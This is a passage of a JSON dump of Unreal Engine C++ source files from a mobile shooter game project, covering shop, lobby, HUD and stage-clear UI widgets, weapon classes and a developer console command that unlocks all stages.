스테이트\n\tREADY,\t\t// 캐릭터 애셋 로딩이 완료된 스테이트\n\tDEAD\t\t// 캐릭터 사망 스테이트\n};" }, { "alpha_fraction": 0.6067638993263245, "alphanum_fraction": 0.6094164252281189, "avg_line_length": 25.928571701049805, "blob_id": "9a66056b743ab12c3540edfe2ade023dac6fb6b2", "content_id": "ade71ef4594a358482a0ca4239f0a3ffd337af8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1632, "license_type": "no_license", "max_line_length": 95, "num_lines": 56, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetShop.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetShop.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetShop : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\n\tenum\n\t{\t\n\t\t// 사용하지 않도록 개선 예정\n\t\teMaxLethalShopItemSlot = 3,\t\t// 필살기 \n\t\teMaxWeaponShopItemSlot = 5,\t\t// 무기\n\t};\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\tvirtual void NativeTick(const FGeometry& MyGeometry, float DeltaTime) override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLethalShopLayout();\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateWeaponShopLayout();\n\tUFUNCTION(BlueprintImplementableEvent, Category = \"RewardPoint\")\n\tvoid UpdateRewardPoint();\n\n\tvoid SetBtnEnableAD(bool bEnable);\n\tvoid SetADRemainTime(int32 
nTime);\n\npublic :\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoSucessed();\t\t// 유저가 보상형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoClosed();\t\t// 유저가 보상형 광고 보는중 닫거나 실패하였음\n\t//============================================================================================\n\n\tUPROPERTY()\n\tclass UButton* m_pBtn_ADView;\n\n\t//UPROPERTY()\n\t//class UTextBlock* Text_ADRemainTime;\n\tPG_WIDGET_DECLAR(UTextBlock, Text_ADRemainTime);\n};\n" }, { "alpha_fraction": 0.765527606010437, "alphanum_fraction": 0.765527606010437, "avg_line_length": 35.645668029785156, "blob_id": "acf0c7366ffd23439f41d714a712f179eb81bf1f", "content_id": "512bfe1ad93d1a9ed112b07fc1982b239d2ff25c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4655, "license_type": "no_license", "max_line_length": 164, "num_lines": 127, "path": "/Source/Project_Gun/Private/UI/PG_HUDBattleStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_HUDBattleStage.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n\n#include <Components/TextBlock.h>\n#include <Components/Button.h>\n\nvoid UPG_HUDBattleStage::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tStageTimer = Cast<UTextBlock>(GetWidgetFromName(TEXT(\"StageTimer\")));\n\tABCHECK(nullptr != StageTimer);\n\n\tRewardPoint = Cast<UTextBlock>(GetWidgetFromName(TEXT(\"RewardPoint\")));\n\tABCHECK(nullptr != RewardPoint);\n\n\tLethalAttack = Cast<UTextBlock>(GetWidgetFromName(TEXT(\"LethalAttack\")));\n\tABCHECK(nullptr != LethalAttack);\n\n\tBtn_Rifle = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_Rifle\")));\n\tABCHECK(nullptr != Btn_Rifle);\n\n\tBtn_Flame = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_Flame\")));\n\tABCHECK(nullptr != Btn_Flame);\n\n\tBtn_Shutgun = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_Shutgun\")));\n\tABCHECK(nullptr != Btn_Shutgun);\n\n\tBtn_Laser = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_Laser\")));\n\tABCHECK(nullptr != Btn_Laser);\n\n\tBtn_Grandle = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_Grandle\")));\n\tABCHECK(nullptr != Btn_Grandle);\n}\n\nvoid UPG_HUDBattleStage::BindPlayerState(APG_MyPlayerState* APlayerState)\n{\n\tABCHECK(nullptr != APlayerState);\n\n\tAPlayerState->OnTryUseTheLethalAttack.AddUObject(this, &UPG_HUDBattleStage::UpdateLethalAttack);\n\tAPlayerState->OnUseTheLethalAttackFail.AddUObject(this, &UPG_HUDBattleStage::UpdateLethalAttack);\n\t//APlayerState->OnAddRewardPoint.AddUObject(this, &UPG_HUDBattleStage::UpdateRewardPoint);\n\n\tauto GameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (GameStateStage)\n\t\tGameStateStage->StageTimerDelegate.AddUObject(this, &UPG_HUDBattleStage::UpdateStageTimer);\n\n\n\tBtn_Rifle->OnPressed.AddDynamic(this, &UPG_HUDBattleStage::OnBtnRifle);\n\tBtn_Flame->OnPressed.AddDynamic(this, &UPG_HUDBattleStage::OnBtnFlame);\n\tBtn_Shutgun->OnPressed.AddDynamic(this, &UPG_HUDBattleStage::OnBtnShutgun);\n\tBtn_Laser->OnPressed.AddDynamic(this, &UPG_HUDBattleStage::OnBtnLaser);\n\tBtn_Grandle->OnPressed.AddDynamic(this, &UPG_HUDBattleStage::OnBtnGrandle);\n}\n\nvoid 
UPG_HUDBattleStage::UpdateStageTimer()\n{\n\tABCHECK(nullptr != StageTimer);\n\n\tauto GameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != GameStateStage);\n\n\tFString TextTimer = FString::Printf(TEXT(\"Time : %d\"), GameStateStage->GetRemainStageTimer());\n\tStageTimer->SetText(FText::FromString(TextTimer));\n}\n\nvoid UPG_HUDBattleStage::UpdateRewardPoint()\n{\n\tABCHECK(nullptr != RewardPoint);\n\n\tauto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\tif (MyPlayerState)\n\t{\n\t\tFString TextRewardPoint = FString::Printf(TEXT(\"RP : %d\"), MyPlayerState->GetRewardPoint());\n\t\tRewardPoint->SetText(FText::FromString(TextRewardPoint));\n\t}\n}\n\nvoid UPG_HUDBattleStage::UpdateLethalAttack()\n{\n\tABCHECK(nullptr != LethalAttack);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (pGameStateStage)\n\t{\n\t\tFString TextLethalAttack = FString::Printf(TEXT(\"Lethal Kill : %d\"), pGameStateStage->GetMaxLethalKill());\n\t\tLethalAttack->SetText(FText::FromString(TextLethalAttack));\n\t}\n}\n\nvoid UPG_HUDBattleStage::OnBtnRifle()\n{\n\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\t//if (MyPlayerState)\n\t//\tMyPlayerState->ChangeWeapon(LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_Rifle.BP_Weapon_Rifle_C'\")));\n}\n\nvoid UPG_HUDBattleStage::OnBtnFlame()\n{\n\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\t//if (MyPlayerState)\n\t//\tMyPlayerState->ChangeWeapon(LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_FlameGun.BP_Weapon_FlameGun_C'\")));\n}\n\nvoid UPG_HUDBattleStage::OnBtnShutgun()\n{\n\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\t//if (MyPlayerState)\n\t//\tMyPlayerState->ChangeWeapon(LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_ShotGun.BP_Weapon_ShotGun_C'\")));\n}\n\nvoid UPG_HUDBattleStage::OnBtnLaser()\n{\n\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\t//if (MyPlayerState)\n\t//\tMyPlayerState->ChangeWeapon(LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_LaserBemGun.BP_Weapon_LaserBemGun_C'\")));\n}\n\nvoid UPG_HUDBattleStage::OnBtnGrandle()\n{\n\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\t//if (MyPlayerState)\n\t//\tMyPlayerState->ChangeWeapon(LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_GraenadeLauncher.BP_Weapon_GraenadeLauncher_C'\")));\n}" }, { "alpha_fraction": 0.6150510907173157, "alphanum_fraction": 0.6169092655181885, "avg_line_length": 25.685951232910156, "blob_id": "912641ecfcca180169d5b93c393ad9ae2303c34e", "content_id": "d25c58b74e693b47659703a3fcbd161b17207742", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3323, "license_type": "no_license", "max_line_length": 80, "num_lines": 121, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetMainLobby_Renewal.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetMainLobby_Renewal.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetMainLobby_Renewal : public 
UUserWidget\n{\n\tGENERATED_BODY()\n\n\tenum\n\t{\n\t\teMaxWeaponSlot = PG_MAX_WEAPON_SLOT,\n\t};\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLayoutStage();\n\t// Update the missions of the selected stage\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLayoutMission();\n\t// Refresh the weapon slots\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLayoutWeaponSlot();\n\t// Refresh the reward points\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid UpdateRewardPoint();\n\npublic :\n\t// Options\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnOption();\n\n\t// Stage selection\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnSelectStageNext();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnSelectStagePrev();\n\t\n\t// Start the game\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnGameStart();\n\n\t// Armory (shop)\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnShop();\n\n\t// Weapon selection\n\tUFUNCTION()\n\tvoid OnOpenWeaponInventory(int32 nSlotIndex);\n\tUFUNCTION()\n\tvoid OnCloseWeaponInventory(int32 nSlotIndex, int32 nWeaponIndex);\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnDoNotChangeCloseWeaponInventory();\n\npublic:\n\t//===========================================\n\t// Canvas TopMenu\n\t//===========================================\n\t//PG_WIDGET_DECLAR(UUserWidget, WB_RewardPoint);\n\tPG_WIDGET_DECLAR(UButton, BtnOption);\n\t\n\t//===========================================\n\t// Canvas StageSelect\n\t//===========================================\n\tPG_WIDGET_DECLAR(UButton, BtnSelectStagePrev);\n\tPG_WIDGET_DECLAR(UButton, BtnSelectStageNext);\n\tPG_WIDGET_DECLAR(UTextBlock, TextSelectedStage);\n\tPG_WIDGET_DECLAR(UCanvasPanel, CanvasSelectStageLock);\n\t\n\n\t//===========================================\n\t// Canvas Mission\n\t//===========================================\n\tPG_WIDGET_DECLAR(UButton, BtnFlag);\n\tPG_WIDGET_DECLAR(UButton, BtnLethal);\n\tPG_WIDGET_DECLAR(UButton, BtnTime);\n\tPG_WIDGET_DECLAR(UTextBlock, TextMainLobbyFlag);\n\tPG_WIDGET_DECLAR(UTextBlock, TextMainLobbyLethal);\n\tPG_WIDGET_DECLAR(UTextBlock, TextMainLobbyTime);\n\n\t//===========================================\n\t// Canvas MenuButtons\n\t//===========================================\n\tPG_WIDGET_DECLAR(UButton, BtnGameStart);\n\tPG_WIDGET_DECLAR(UButton, BtnShop);\n\tPG_WIDGET_DECLAR(UCanvasPanel, CanvasGameStart);\n\t\n\n\t//===========================================\n\t// Canvas WeaponBox\n\t//===========================================\n\tPG_WIDGET_DECLAR_TArray(UPG_UserWidgetWeaponBox, WB_WeaponBox);\n\n\t//===========================================\n\t// Canvas ADBanner\n\t//===========================================\n\n\t//===========================================\n\t// Canvas WB_WeaponInventory \n\t//===========================================\n\tPG_WIDGET_DECLAR(UScaleBox, ScaleWeaponInventory);\n\tPG_WIDGET_DECLAR(UPG_UserWidgetWeaponInventory, WB_WeaponInventory);\n\npublic :\n\t// Armory (shop)\n\tUPROPERTY(EditAnywhere, BlueprintReadOnly, Category = \"PG Setting WidgetClass\")\n\tTSubclassOf <class UPG_UserWidgetScreenShop> WB_ShopClass;\n\tUPROPERTY()\n\tclass UPG_UserWidgetScreenShop* m_pWBShop = nullptr;\n};\n" }, { "alpha_fraction": 0.742168664932251, "alphanum_fraction": 0.7427710890769958, "avg_line_length": 24.55384635925293, "blob_id": "08043936a7878a8ade1f4f43ec5bcd3b7219e21c", "content_id": "811a5ba993540eb46d7cd98b05347e3240944782", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1762, "license_type": "no_license", "max_line_length": 113, "num_lines": 65, "path": 
"/Source/Project_Gun/Private/BlueScriptObject/Weapon/PG_WeaponRifle.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Weapon/PG_WeaponRifle.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include <Engine/StaticMeshSocket.h>\n\n\nAPG_WeaponRifle::APG_WeaponRifle()\n{\n}\n\nvoid APG_WeaponRifle::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tif (FiringEffect)\n\t{\n\t\tFName SocketFire(TEXT(\"Socket_FiringEffect\"));\n\t\tFiringEffect->AttachToComponent(Weapon, FAttachmentTransformRules::SnapToTargetNotIncludingScale, SocketFire);\n\t\tFiringEffect->SetActive(false, true);\n\t}\n}\n\nvoid APG_WeaponRifle::Fire()\n{\n\tFName SocketFire(TEXT(\"Socket_Fire_0\"));\n\t// 프로젝타일 발사를 시도합니다.\n\tFVector\t\tvLocation = Weapon->GetSocketLocation(SocketFire);\n\tFRotator\trRotation = Weapon->GetSocketRotation(SocketFire);\n\tUWorld*\t\tWorld = GetWorld();\n\tif (World)\n\t{\n\t\tFActorSpawnParameters SpawnParams;\n\t\tSpawnParams.Owner = this;\n\t\tSpawnParams.Instigator = GetInstigator();\n\n\t\t// 총구 위치에 발사체를 스폰시킵니다.\t\t\n\t\tauto Projectile = World->SpawnActor<APG_Projectile>(WeaponData.BProjectile, vLocation, rRotation, SpawnParams);\n\t\tif (Projectile)\n\t\t{\n\t\t\t// 발사 방향을 알아냅니다.\n\t\t\tFVector LaunchDirection = rRotation.Vector();\n\n\t\t\t// 몬스터가 사용하는 무기 여부\n\t\t\tbool bMonsterWeapon = (nullptr != Cast<APG_MonChar>(GetOwner()));\n\n\t\t\tProjectile->FireInDirection(GetWeaponData(), LaunchDirection, bMonsterWeapon);\n\t\t}\n\t}\n\n\tif (FiringEffect && false == FiringEffect->IsActive())\n\t\tFiringEffect->SetActive(true, true);\n\n\tif (FireSound)\n\t\tFireSound->Play();\n\n}\n\nvoid APG_WeaponRifle::StopFire()\n{\n\tif (FiringEffect && FiringEffect->IsActive())\n\t\tFiringEffect->SetActive(false);\n}" }, { "alpha_fraction": 0.7487373948097229, "alphanum_fraction": 0.75, "avg_line_length": 19.30769157409668, "blob_id": "e21bd18cc08f6cdce0a6488206c70d058c85d951", "content_id": "8b970745126cd81196dad85024c623b439851c0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 838, "license_type": "no_license", "max_line_length": 91, "num_lines": 39, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_WeaponShotgun.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\n#include \"PG_WeaponShotgun.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_WeaponShotgun : public APG_Weapon\n{\n\tGENERATED_BODY()\n\t\n\tenum \n\t{\n\t\teMax_ShotgunProjectile = 5,\t// 샷건 발사시 동시에 발사되는 탄약 개수\n\t};\n\t\npublic:\n\tAPG_WeaponShotgun();\n\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void Destroyed() override;\n\t\npublic:\n\tvirtual void Fire() override;\n\tvirtual void StopFire() override;\n\nprivate:\n\tUPROPERTY()\n\tclass APG_Projectile* CurrFireShutgun;\t\t// 현재 쏘고있는 Shutgun Projectile\n\n\tUFUNCTION()\n\tvirtual void OnFiringEffectEndParticle(UParticleSystemComponent* ParticleSystemComponent);\n};\n" }, { "alpha_fraction": 0.7171339392662048, "alphanum_fraction": 0.7196261882781982, "avg_line_length": 21, "blob_id": "b93b7742dd205ad4cecccfecc14083acf42aac38", "content_id": 
"bdf3033ebceaccd040eb01a35ee1beeec614c7da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1607, "license_type": "no_license", "max_line_length": 79, "num_lines": 73, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_CommandAllStageUnlock.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n#include \"Game/Console/Commands/PG_CommandAllStageUnlock.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\nPG_CommandAllStageUnlock::PG_CommandAllStageUnlock()\n{\n}\n\nPG_CommandAllStageUnlock::~PG_CommandAllStageUnlock()\n{\n}\n\n\nvoid PG_CommandAllStageUnlock::UpdateCommand()\n{\n\tif (bOnCommand)\n\t{\n\t\tbOnCommand = false;\n\t\tExcute();\n\t}\n}\n\nvoid PG_CommandAllStageUnlock::Excute()\n{\n\tABCHECK(nullptr != G_PGWorld);\n\tABCHECK(nullptr != m_pConsoleVariable);\n\n\tint32 nGetVar = m_pConsoleVariable->GetInt();\n\tif (1 != nGetVar)\n\t\treturn;\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(G_PGWorld->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeBase = Cast<APG_GameModeBase>(G_PGWorld->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase);\n\n\tTArray<const FPGStageData*> kStageDatas;\n\tif (false == pGameInstance->GetAllTableStageData(kStageDatas))\n\t{\n\t\tABLOG_S(Error);\n\t\treturn;\n\t}\n\n\tint nStageID = 1;\n\tfor (auto StageData : kStageDatas)\n\t{\n\t\tif (pGameModeBase->IsFirstPlayStage(nStageID))\n\t\t{\n\t\t\tif (false == pGameModeBase->SetSelectSaveStageData(nStageID))\n\t\t\t{\n\t\t\t\tABLOG(Error, TEXT(\"ChangeSelectStageData Error : %d\"), nStageID++);\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tif (false == pGameModeBase->SaveStageData())\n\t\t\t{\n\t\t\t\tABLOG(Error, TEXT(\"SaveStageData Error : %d\"), nStageID++);\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t}\n\n\t\t++nStageID;\n\t}\n}\n\nvoid PG_CommandAllStageUnlock::OnChangeCommand()\n{\n\tABCHECK(nullptr != m_pConsoleVariable);\n\tbOnCommand = true;\n}" }, { "alpha_fraction": 0.7456339597702026, "alphanum_fraction": 0.7479916214942932, "avg_line_length": 30.72576141357422, "blob_id": "03c8f9c6c4786e1bce7fd926574e619a4b7e74ee", "content_id": "d981ec56e1d145444f3303e9699705f82eb7d53f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 11544, "license_type": "no_license", "max_line_length": 217, "num_lines": 361, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetScreenStageClear.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetScreenStageClear.h\"\n#include \"UI/PG_UserWidgetMessagePopup.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n#include <Components/Image.h>\n\nvoid UPG_UserWidgetScreenStageClear::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UTextBlock, TextTitle);\n\t//===================================================\n\t// Canvas MissionState\n\t//===================================================\n\tPG_WIDGET_LINK(UButton, BtnFlag);\n\tPG_WIDGET_LINK(UImage, 
ImgIconFlagPrice);\n\tPG_WIDGET_LINK(UTextBlock, TextFlagPoint);\n\tPG_WIDGET_LINK(UButton, BtnLethal);\n\tPG_WIDGET_LINK(UImage, ImgIconLethalPrice);\n\tPG_WIDGET_LINK(UTextBlock, TextLethalPoint);\n\tPG_WIDGET_LINK(UButton, BtnTime);\n\tPG_WIDGET_LINK(UImage, ImgIconTimePrice);\n\tPG_WIDGET_LINK(UTextBlock, TextTimePoint);\n\n\t//===================================================\n\t// CanvasClearPointList\n\t//===================================================\n\tPG_WIDGET_LINK(UTextBlock, TextStageClearPoint);\t\t\n\tPG_WIDGET_LINK(UTextBlock, TextMonsterKillPoint);\t\t\n\tPG_WIDGET_LINK(UTextBlock, TextMissionPoint);\t\t\t\n\n\t//===================================================\n\t// CanvasViewAD\n\t//===================================================\n\tPG_WIDGET_LINK(UButton, BtnADView);\n\tPG_WIDGET_LINK(UTextBlock, TextClearADTimer);\n\n\t//===================================================\n\t// CanvasTotalPoint\n\t//===================================================\n\tPG_WIDGET_LINK(UTextBlock, TextTotalPoint);\n\n\t//===================================================\n\t// CanvasBottomMenu\n\t//===================================================\n\tPG_WIDGET_LINK(UButton, BtnGoHome);\n\tPG_WIDGET_LINK(UButton, BtnRetry);\n\tPG_WIDGET_LINK(UButton, BtnNext);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\tpGameStateStage->OnViewAD.AddUObject(this, &UPG_UserWidgetScreenStageClear::OnViewResultAD);\n\n\t{\n\t\tm_pUserWidgetMessagePopup = CreateWidget<UPG_UserWidgetMessagePopup>(GetWorld(), LoadClass<UPG_UserWidgetMessagePopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_MessagePopup.WB_MessagePopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\n\t\tm_pUserWidgetMessagePopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetScreenStageClear::OnMessagePopupBoxClose);\n\t\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetMessagePopup->AddToViewport(999);\n\t}\n}\n\nvoid UPG_UserWidgetScreenStageClear::NativeTick(const FGeometry& MyGeometry, float DeltaTime)\n{\n\tSuper::NativeTick(MyGeometry, DeltaTime);\n\n\tif (false == m_bWasViewStageClear3X)\n\t{\n\t\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\t\tABCHECK(nullptr != pGameInstance);\n\n\t\tint32 nRemainTime = pGameInstance->GetADRemainTime(EADType::eAT_StageClear3X);\n\t\tSetBtnBonusADTime(nRemainTime);\n\t\tSetBtnEnableAD((nRemainTime <= 0));\n\t}\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetVisibility(ESlateVisibility InVisibility)\n{\n\tSuper::SetVisibility(InVisibility);\n\n\tif (ESlateVisibility::Hidden != InVisibility)\n\t{\n\t\tif (PopupPlaySound)\n\t\t\tPlaySound(PopupPlaySound);\n\t}\n}\n\nbool UPG_UserWidgetScreenStageClear::IsAbleViewStagePlayAD()\n{\n\tif (m_bWasViewStageClear3X)\n\t{\n\t\t// 스테이지 클리어 후 보상형 광고를 보았으면 스테이지 플레이 광고를 볼 수 없다.\n\t\treturn false;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\treturn pGameInstance->IsAbleADView(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetScreenStageClear::UpdateClearStageLayout()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tauto pTableStageData = 
pGameInstance->GetTableStageData(pGameModeStage->GetPlayStageID());\n\tABCHECK(nullptr != pTableStageData);\n\n\tm_pkTextTitle->SetText(FText::FromString(pTableStageData->StageName));\n\n\t// 몬스터 킬\n\tbool bIsClearAmount = pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill);\n\tbool bIsWasClearAmount = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_AmountKill);\n\tif (bIsClearAmount || bIsWasClearAmount)\n\t{\n\t\tm_pkBtnFlag->SetIsEnabled(false);\n\t\tSetBonusFlag(bIsWasClearAmount, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tm_pkBtnFlag->SetIsEnabled(true);\n\t}\n\n\t// 필살기\n\tbool bIsClearLethal = pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal);\n\tbool bIsWasClearLethal = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_Lethal);\n\tif (bIsClearLethal || bIsWasClearLethal)\n\t{\n\t\tm_pkBtnLethal->SetIsEnabled(false);\n\t\tSetBonusLethal(bIsWasClearLethal, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tm_pkBtnLethal->SetIsEnabled(true);\n\t}\n\n\t// 시간 \n\tbool bIsClearTime = pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime);\n\tbool bIsWasClearTime = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_ClearTime);\n\tif (bIsClearTime || bIsWasClearTime)\n\t{\n\t\tm_pkBtnTime->SetIsEnabled(false);\n\t\tSetBonusTime(bIsWasClearTime, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tm_pkBtnTime->SetIsEnabled(true);\n\t}\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tSetBonusStageClear(pGameStateStage->GetClearStagePoint());\n\tSetBonusMonsterKill(pGameStateStage->GetClearMonsterKillPoint());\n\tSetBonusMissionPoint(pGameStateStage->GetClearMissionPoint());\n\tSetTotalReward(pGameStateStage->GetClearTotalPoint());\n}\n\nvoid UPG_UserWidgetScreenStageClear::ShowMessageBox(FString kTitle, FString kDescription)\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetTitle(kTitle);\n\tm_pUserWidgetMessagePopup->SetDescription(kDescription);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusFlag(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != m_pkImgIconFlagPrice);\n\tABCHECK(nullptr != m_pkTextFlagPoint);\n\n\tm_pkTextFlagPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nBonus)));\n\n\tif (bWasClear)\n\t{\n\t\tm_pkImgIconFlagPrice->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pkTextFlagPoint->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tm_pkImgIconFlagPrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkTextFlagPoint->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusLethal(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != m_pkImgIconLethalPrice);\n\tABCHECK(nullptr != m_pkTextLethalPoint);\n\n\tm_pkTextLethalPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nBonus)));\n\n\tif 